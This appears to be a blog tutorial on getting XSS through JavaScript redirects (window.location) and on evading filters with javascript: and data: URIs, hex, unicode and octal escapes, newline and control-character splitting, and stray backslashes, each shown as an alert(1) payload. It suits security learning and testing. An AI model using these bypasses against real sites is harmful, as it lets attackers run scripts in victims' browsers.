Skip to main content

Xssing Web Part - 1


Xssing Web Part - 1


 Hello,

 I'm thinking about sharing everything I know about XSS :) However it's not possible to put all methods in one single post so I would be making several parts of "Xssing Web". Mostly I would be talking about how to bypass XSS filters and how to turn most of non exploitable XSS to exploitable.


All of you might have encountered one such end point that takes URL as parameter and redirects to it using javascript like :

 location.href='URL' 
or
window.location.href='URL' 
or
window.location.replace('URL') 
or
window.location='URL'
In this post I would be talking about how to get XSS in such situations and how to bypass their filters.

 First thing we can do here is try 'javascript' protocol or 'data' URI scheme.

 window.location='javascript:alert(1)'
or
window.location='data:html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg'

 It would execute 'alert(1)' function.

 From now onwards I will only be talking about 'javascript' protocol since same methods can be applied on 'data' URI as well.

Let's start,
What if 'javascript:' string is blocked??

 Do you know strings in the javascript can be encoded in hex format also??
Format 1 : \x[HEX]
Format 2 : \u00[HEX]

 Format 1 : javascript: --> \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a
Format 2 : javascript: --> \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003a

  Bypasses :

  \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)

\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)


What if  'javascript:' and '\x'  and '\u' is blocked??

  Do you know we can continue string to newline by ending string with backslash character?? ;)

  Bypass : java\[0x0a]script:alert(1)


Here [0x0a] is new line character. You can pass newline character as input by "%0a" in URL.

 These are few alternatives to newline character which you can try if newline character is also blocked :

 [0x09] <---- Horizontal Tab
[0x0d] <---- Carriage Return

 Ok now what if 'javascript:' and '\x'  and '\u' and [0x0a,0x09,0x0d] are also blocked ?

  Do you know there are control characters in JS too??

 Here are few control characters that we can use to bypass the filter :

 \t  <---- Horizontal Tab
\n <---- Newline
\r <---- Carriage Return

 Bypass :  ja\nva\tscript\r:alert(1)


You can use any one or all of this control chars anywhere in string ;)

 Note : Sometimes the filter itself converts 0x0a,0x09,0x0d into \n,\t,\r so you can take advantage of that also ;)

  Now let's assume 'javascript:' and '\x'  and '\u' and [0x0a,0x09,0x0d] and [\n,\t,\r] are blocked??

  Ok do you know escape character??

 What happens if we try to escape any character that does not form a control char (\n,\t,\b,\v,\f,\r and of course \x,\u too)  ??

  The answer is NOTHING.

 So we can put escape char in front of any character except n,t,b,v,f,r,x,u and digits.

 Bypass : \j\av\a\s\cr\i\pt\:\a\l\ert\(1\)


One of my friend @OsandaMalith found one more bypass. [You can read his awesome blog here

We can encode string in octal as well : 

Format 1 : \[OCTAL] 

Format 1 : javascript ---> \152\141\166\141\163\143\162\151\160\164
 
Bypass : \152\141\166\141\163\143\162\151\160\164\072alert(1)



That's enough for today ;)
  
Ref :

 http://www.asciitable.com/
https://en.wikipedia.org/wiki/Control_character
https://mathiasbynens.be/notes/javascript-escapes

Comments

Post a Comment

Popular posts from this blog

Xssing Web Part - 2

Xssing Web With Unicodes Hello friends,  This is the second part of "Xssing Web". In this post I would show how to abuse unicodes to bypass XSS filters.  BTW if you want to check previous part click here . Note : If you think there are any mistakes in this post then kindly mention it in comments. I have developed several XSS challenges to show how unicodes can be used to bypass filters. If you want to try those challenges first then click here , get back here if you couldn't solve any. Abusing Unicode : So what is Unicode? -> Unicode is nothing but the encoding standard. It  defines  UTF-8 ,  UTF-16 , UTF-32 , etc encodings. 1) UTF-8 : Characters Size : 1 byte to 4 byte Example : Character "A" => 0x41 Character "¡"  => 0xC2 0xA1 Character "ಓ" => 0xE0 0xB2 0x93 Character "𪨶" => 0xF0 0xAA 0xA8 0xB6 2) UTF-16 : Character Size : 2 byte However in UTF-16 there are two...
5 comments
Read more

Controlling Raspberry Pi B/B+ from your smartphone (Tutorial)

In this tutorial I'll tell you how to control your raspberry pi from your smartphone. So follow below tutorial and say good bye to monitor,keyboard and mouse. Requirements: 1)Raspberry Pi 2)Wi-Fi adapter 3)Smartphone with Wi-Fi Hotspot feature (I would be using Android in this tutorial) Tutorial:- Step 1) First install Raspbian OS in SD card and connect SD card to your PC Step 2) Raspberry Pi Configuration  : -Open SD card using file manager as shown in this SS:-   -Now press Ctrl+L and copy the location as show in this SS:- -Now open terminal and change directory to SD card location like this :-        cd /media/c1398422-7a7c-4863-8a8f-45a1db26b4f2 -Now run below commands  :- Command 1: sudo echo " auto wlan0 iface lo inet loopback iface eth0 inet dhcp iface default inet dhcp iface wlan0 inet dhcp allow-hotplug wlan0 wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf">etc/network/...
5 comments
Read more